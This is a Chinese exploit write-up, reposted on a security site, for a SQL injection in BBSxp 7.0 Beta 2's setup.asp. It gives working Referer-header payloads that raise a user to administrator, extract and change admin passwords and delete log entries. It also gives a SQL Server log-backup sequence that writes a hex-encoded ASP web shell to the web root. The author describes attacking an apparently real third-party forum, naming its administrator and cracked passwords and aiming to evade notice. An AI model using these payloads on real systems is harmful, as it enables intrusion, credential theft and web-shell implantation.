再暴BBSxp 7.0 Beta 2漏洞 's

admin 2017年4月28日12:33:18评论219 views字数 1974阅读6分34秒阅读模式
摘要

作者:TTFCT漏洞存在于文件setup.asp中第一部份注册->登陆->发帖->编辑->抓包->改包->提升为管理员->更改后台密码->登陆后台->WEBSHELL

作者:TTFCT

漏洞存在于文件setup.asp中

第一部份

注册->登陆->发帖->编辑->抓包->改包->提升为管理员->更改后台密码->登陆后台->WEBSHELL

这里我设密码为:ttfct1 ,NC提交,成功提为管理员。用密码:ttfct1登陆后台。成功获取WEBSHELL,成功备份,获取WEBSHELL 成功。

WEBSHELL获取的两种方法
一:后台上传增加 htr
二:log备份,共4步

第二部份

检测官方网站
我已注册好了,用户是sina147
注册->登陆->发帖->编辑->抓包
为了不引起管理员注意,我们直接获取管理员密码和后台密码,然后登陆后台。

不好意思,刚才出了点问题,停电了。继续,抓包,修改,我查了一下,yuzi就是管理员了。

yuzi的密码5D4D89BEA718BEE10686FB053E86F13B->080532779
后台登陆密码:531BC3E862F67DC2BAA871EABDE81A4F->080532449

登陆后台
本文件请求的物理路径 D:/www/bbs.yuzi.net/Admin_other.asp 有了这个,就有机会拿WEBSHELL了
后面的动画就不作了,大家发挥吧。

OVER
************************************************************************************
提升为管理员:
Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserRoleID=1 where username='sina'–

获取管理员密码(即一次密码):
Referer: http://127.0.0.1','', '','修改帖子成功');update bbsxp_users set UserMail= (select userpass from bbsxp_users where username='yuzi') where username='sina147'

获取后台密码(即二次密码):
Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'

更改后台管理密码(二次密码)
Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')

删除日志:
Referer: http://127.0.0.1','','','修改帖子成功');delete from bbsxp_log where username='sina147'

LOG备份
备份地址:C:/Inetpub/wwwroot/ttfct.asp

第一步
create table [dbo].[shit_tmp] ([cmd] [image])

第二步
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate

第三步
insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)

第四步
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005C0077007700770072006F006F0074005C00740074006600630074002E00610073007000 backup log @a to [email protected] with init,no_truncate

第五步
Drop table [shit_tmp]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月28日12:33:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   再暴BBSxp 7.0 Beta 2漏洞 'shttps://cn-sec.com/archives/49390.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息